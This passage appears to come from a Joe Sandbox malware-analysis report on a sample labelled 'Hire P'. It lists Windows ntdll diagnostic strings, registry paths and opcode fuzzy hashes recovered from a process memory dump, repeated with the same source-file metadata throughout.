                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                            • String ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            Strings
                                                            • LdrpInitializeProcess, xrefs: 010F8422
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                                            • @, xrefs: 010F8591
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                                            • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                                            • .Local, xrefs: 010F28D8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            Strings
                                                            • RtlDeactivateActivationContext, xrefs: 01133425, 01133432, 01133451
                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01133437
                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01133456
                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0113342A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                            Strings
                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                            Strings
                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01133640, 0113366C
                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0113362F
                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 0113365C
                                                            • LdrpFindDllActivationContext, xrefs: 01133636, 01133662
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                                            • apphelp.dll, xrefs: 010E2462
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                                            • LdrpDynamicShimModule, xrefs: 0112A998
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • HEAP: , xrefs: 010D3264
                                                            • HEAP[%wZ]: , xrefs: 010D3255
                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $@
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            Strings
                                                            • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                                            • LdrpCheckModule, xrefs: 0112A117
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                                            • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • @, xrefs: 0117C1F1
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                                            • PreferredUILanguages, xrefs: 0117C212
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            Strings
                                                            • LdrpCheckRedirection, xrefs: 0114488F
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            • API ID:
                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                                            • LdrpInitializationFailure, xrefs: 011420FA
                                                            • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            Strings
                                                            • LdrResSearchResource Enter, xrefs: 010CAA13
                                                            • LdrResSearchResource Exit, xrefs: 010CAA25
                                                            • API ID:
                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API ID:
                                                            • String ID: @$MUI
                                                            Strings
                                                            • kLsE, xrefs: 010C0540
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                                            • API ID:
                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API ID: InitializeThunk
                                                            • String ID: Cleanup Group$Threadpool!
                                                            • API ID:
                                                            • String ID: MUI
                                                            • API ID:
                                                            • String ID: GlobalTags
                                                            • API ID:
                                                            • String ID: .mui
                                                            • API ID:
                                                            • String ID: EXT-
                                                            • API ID:
                                                            • String ID: AlternateCodePage
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API ID:
                                                            • String ID: #
                                                            • API ID:
                                                            • String ID: BinaryName
                                                            Strings
                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                                            • API ID:
                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                            • Instruction Fuzzy Hash: 28425F75E10219CFEB69CF6AC841BADBBF5BF48300F148099E999EB242D7349981CF50
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                                            • Instruction ID: 455f228e57c7c9f7d7138e442dfc08df34fa312ed0441b2609d4a40131e8e25c
                                                            • Opcode Fuzzy Hash: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                                            • Instruction Fuzzy Hash: DA32DE70A007658FEB2DCF69C8447BEBBF2BF84304F24411DD9969B285DB75A862CB50
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                                            • Instruction ID: e43e73ef3c5ac9072131184fbfed59b86dd4aee8e763913c270d8bf738f93453
                                                            • Opcode Fuzzy Hash: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                                            • Instruction Fuzzy Hash: B222D4702046618FE72DCF2DE490372BBF9AF45304F098459D9969F286D737E862CB61
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db2775f6b68cd44549432960a10acfd32407b3a8a5b41b6f877a6b469316f1aa
                                                            • Instruction ID: ae0d8c9b8670f61856a08450b13d601b490642bd0c72f339c43be4dfa136feb0
                                                            • Opcode Fuzzy Hash: db2775f6b68cd44549432960a10acfd32407b3a8a5b41b6f877a6b469316f1aa
                                                            • Instruction Fuzzy Hash: D3225C70E0422A9FCF19CF9AD4849FEFBF2AF44304B15805AE9859B241E734DD51CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                                            • Instruction ID: bbb48cb9698bb9d3b53bd70429b14b830745d5b5c8312fa43f0adda341880b1f
                                                            • Opcode Fuzzy Hash: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                                            • Instruction Fuzzy Hash: 6A329C70A04215DFDB29CF68C480AAEBBF2FF48710F24456EE995AB391D731A851CF90
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                            • Instruction ID: 4ad29277baf7fad50c0ef3383d6727afdd93d276d1d78c6d643163e84744938e
                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                            • Instruction Fuzzy Hash: 64F19F71E0421A9FDF19DF9AC884BAEBBF5AF48710F048169E985EB340E775D841CB60
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6678bf9c59e18e38ded10e4dbf657d914ba17ca1d1c6316ce162964854b14f67
                                                            • Instruction ID: e1339d89489e69a7fc8dc2c48ec6d6108c01e7209805705029c3f6b6bee818bc
                                                            • Opcode Fuzzy Hash: 6678bf9c59e18e38ded10e4dbf657d914ba17ca1d1c6316ce162964854b14f67
                                                            • Instruction Fuzzy Hash: 6CD1EF71E0060ACFDF4DCF6AC841AFEB7F5AF88304F198169D965A7281E735E9058B60
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a40d9dae3359158a78e67a0e548fc1b5d432019aa0f94b9ff39037232bd339ec
                                                            • Instruction ID: 4e4fcbe505c9d4a8a7a07bc341419cf22527eb4198a0fae6efeadee6a9e6272d
                                                            • Opcode Fuzzy Hash: a40d9dae3359158a78e67a0e548fc1b5d432019aa0f94b9ff39037232bd339ec
                                                            • Instruction Fuzzy Hash: 03E16C715083429FC725CF28C490A6EBBE0FF89714F158A6DE99987351EB32E905CF92
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                                            • Instruction ID: 38ad58b5256610fa62c6d2c72bd69f9a02bb96dc422bd23e3cd384352e797c18
                                                            • Opcode Fuzzy Hash: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                                            • Instruction Fuzzy Hash: DCD1E471A002069BDB18DF69C8C0AFEB7F9BF54308F04852EE955DB2A4EB34D955CB50
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction ID: e7eb66a617c309dc1fdf2587c1d31dbfd9df6af99d578751efc2a238d56d9b26
                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction Fuzzy Hash: CDB15374A00605AFDB68DFD9C940EEBBBB9FF84B04F14446DAA4297790DB34E906CB10
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction ID: b45d93123d6653b894515795e6d482afe0730e4a673d77a7e20dd12e960f137a
                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction Fuzzy Hash: 91B10531600756AFDB19DB68C890BBFBBF6AF84300F150199E6969B385D734E941CB90
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                                            • Instruction ID: 2dc41bc75b561d39ff04b487ab7af25bc02d377d674d8a6822ff7467ad24d794
                                                            • Opcode Fuzzy Hash: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                                            • Instruction Fuzzy Hash: B1C156742083419FD764CF19C494BAFB7E4BF98704F44896EE98987291D7B4E908CF92
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                                            • Instruction ID: c53d5fc875ac65c5957777ff29c8a28ed864164e6d3a189a0eb1b88b7758409c
                                                            • Opcode Fuzzy Hash: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                                            • Instruction Fuzzy Hash: 97B18270A002668BEB65CF58C990BEDB7F5EF44704F0485EAD58AE7281EB709DC5CB21
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                                            • Instruction ID: d5f086871d93cba70ada871201e7f9ed0636e291425835ec1a0f4e0c96751468
                                                            • Opcode Fuzzy Hash: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                                            • Instruction Fuzzy Hash: B0A14531E0062A9FEB2ADB59C848FAEBBF4FB04754F050161EA90AB2D0D7749D51CBD1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                                            • Instruction ID: 4888dc9bea8135307e9f5c6b455e99309ee14bef968abb898589ed03ce7bc9ea
                                                            • Opcode Fuzzy Hash: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                                            • Instruction Fuzzy Hash: 51A1C070F0161A9FDB2EDF69C990BAAB7A1FF48358F014029EA45D72C1DBB4E815CB40
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                                            • Instruction ID: c64e8209d65ddf529947a66fd636534335f467ef9f75665f992f32f015490613
                                                            • Opcode Fuzzy Hash: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                                            • Instruction Fuzzy Hash: 2DA1D072A14612DFDB29DF58CA80B5AB7E9FF58704F050528F5A5DBA50C334EC42CB92
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                                            • Instruction ID: a42cfa15e71f5ce8571074c5ad89e917275e5906d79dc6b62551e2bc499929c1
                                                            • Opcode Fuzzy Hash: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                                            • Instruction Fuzzy Hash: 7391C471E04216AFDF19CFA8D894BAEBFB5AF4AB14F154169E614EB340D734D900CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                                            • Instruction ID: fd96bd2fec8d34e0ecd02eef350f0cb6df179d613694fd144f45a7ce97648433
                                                            • Opcode Fuzzy Hash: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                                            • Instruction Fuzzy Hash: 76911532A0072ACBEB28DB5DC480BBE7BA1EF94758F054169E9859F284FB34DD41CB51
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                                            • Instruction ID: d629e23cc64e27d53bdac26cd6e51290cb729a69df65a258fd9e02f6a5c3d851
                                                            • Opcode Fuzzy Hash: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                                            • Instruction Fuzzy Hash: 3F818071A0061A9BDB18CF69C890ABEFBF9FB48700F04853EE445E7644E775D940CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction ID: 10d9f50a63a619b633fcce28ac6d58aea7ce1fc74b35558e9f9a55ab4477cf62
                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction Fuzzy Hash: F6817E71A002099FDF1DDF98D890AAEBBB6BF84310F19C56AD9169B384D774E902CF50
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                                            • Instruction ID: 8e472d2edff610e9261b3a0be93d46b891ab863e7e752f2ae1707e64d5e35fcd
                                                            • Opcode Fuzzy Hash: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                                            • Instruction Fuzzy Hash: EE71B371A0470A9BEB2DCF19C8A0B6EF7E4BB44358F054939E9A5C7204E730E944CB92
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
